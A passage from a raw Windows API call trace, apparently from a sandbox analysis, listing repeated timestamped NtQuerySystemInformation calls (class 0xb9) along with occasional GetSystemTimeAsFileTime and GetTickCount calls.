ResultLength=0x0) [0271.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0271.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.159] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcc20 | out: lpSystemTimeAsFileTime=0xc751dfcc20*(dwLowDateTime=0x2e4a6d0, dwHighDateTime=0x1d5fb6f)) [0271.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0271.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0271.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb28, Length=0x50, ResultLength=0x0) [0271.159] GetTickCount () returned 0x118419b [0271.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0271.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0271.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0271.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0271.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0271.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0271.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x28, ResultLength=0x0) [0271.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0271.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0271.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0271.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0271.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0271.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 